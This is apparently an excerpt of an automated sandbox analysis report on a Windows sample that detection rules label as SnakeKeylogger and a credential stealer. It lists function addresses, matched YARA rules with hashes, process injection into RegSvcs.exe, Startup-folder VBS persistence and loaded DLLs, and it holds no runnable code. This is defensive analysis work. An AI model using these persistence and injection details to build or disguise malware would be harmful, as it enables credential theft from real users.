                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633FC683_2_0633FC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06339C6D3_2_06339C6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633FC5E3_2_0633FC5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633CCA03_2_0633CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633D5503_2_0633D550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633D5403_2_0633D540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633DDFF3_2_0633DDFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633E2583_2_0633E258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633E24A3_2_0633E24A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633EAF83_2_0633EAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06330B203_2_06330B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_063393283_2_06339328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633EB083_2_0633EB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633F3B83_2_0633F3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06338BA03_2_06338BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633C3AE3_2_0633C3AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06338B903_2_06338B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633003F3_2_0633003F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633F8103_2_0633F810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633501C3_2_0633501C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633F8023_2_0633F802
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_063300403_2_06330040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633D0F83_2_0633D0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633295B3_2_0633295B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633D9A83_2_0633D9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633D9993_2_0633D999
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 6_2_01405F486_2_01405F48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126C1467_2_0126C146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126A0887_2_0126A088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012653627_2_01265362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126D2787_2_0126D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126C4687_2_0126C468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126C7387_2_0126C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012669A07_2_012669A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126E9887_2_0126E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126CA087_2_0126CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126CCD87_2_0126CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126CFAA7_2_0126CFAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01266FC87_2_01266FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126F6447_2_0126F644
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126E97A7_2_0126E97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012629E07_2_012629E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0126FA9C7_2_0126FA9C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01263A997_2_01263A99
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01263E097_2_01263E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD29687_2_01AD2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD95487_2_01AD9548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD50287_2_01AD5028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD9C187_2_01AD9C18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD17A07_2_01AD17A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD0B307_2_01AD0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD1E807_2_01AD1E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADD9A87_2_01ADD9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADD9997_2_01ADD999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADDDF17_2_01ADDDF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADD5407_2_01ADD540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADD5507_2_01ADD550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADCCA07_2_01ADCCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADCC8F7_2_01ADCC8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADD0E97_2_01ADD0E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADD0F87_2_01ADD0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADF8057_2_01ADF805
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD00067_2_01AD0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD50187_2_01AD5018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADF8107_2_01ADF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADFC687_2_01ADFC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD00407_2_01AD0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADF3A87_2_01ADF3A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD8BA07_2_01AD8BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADF3B87_2_01ADF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD178F7_2_01AD178F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD8B907_2_01AD8B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD93287_2_01AD9328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD0B207_2_01AD0B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADEB087_2_01ADEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADEF607_2_01ADEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADEF517_2_01ADEF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADE6A07_2_01ADE6A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADE6B07_2_01ADE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADEAF87_2_01ADEAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADDE007_2_01ADDE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01AD1E707_2_01AD1E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADE2587_2_01ADE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01ADE2577_2_01ADE257
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: String function: 00ABF9F2 appears 40 times
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: String function: 00AA9CB3 appears 31 times
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: String function: 00AC0A30 appears 46 times
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: String function: 00F69CB3 appears 31 times
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: String function: 00F7F9F2 appears 40 times
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: String function: 00F80A30 appears 46 times
                Source: oagkiAhXgZ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B137B5 GetLastError,FormatMessageW,0_2_00B137B5
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B010BF AdjustTokenPrivileges,CloseHandle,0_2_00B010BF
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B016C3
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FC10BF AdjustTokenPrivileges,CloseHandle,2_2_00FC10BF
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00FC16C3
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B151CD
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00B2A67C
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00B1648E
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00AA42A2
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeFile created: C:\Users\user\AppData\Local\ThebesianJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeFile created: C:\Users\user\AppData\Local\Temp\autBCB7.tmpJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs"
                Source: oagkiAhXgZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.000000000329F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: oagkiAhXgZ.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeFile read: C:\Users\user\Desktop\oagkiAhXgZ.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\oagkiAhXgZ.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeProcess created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeProcess created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe" Jump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
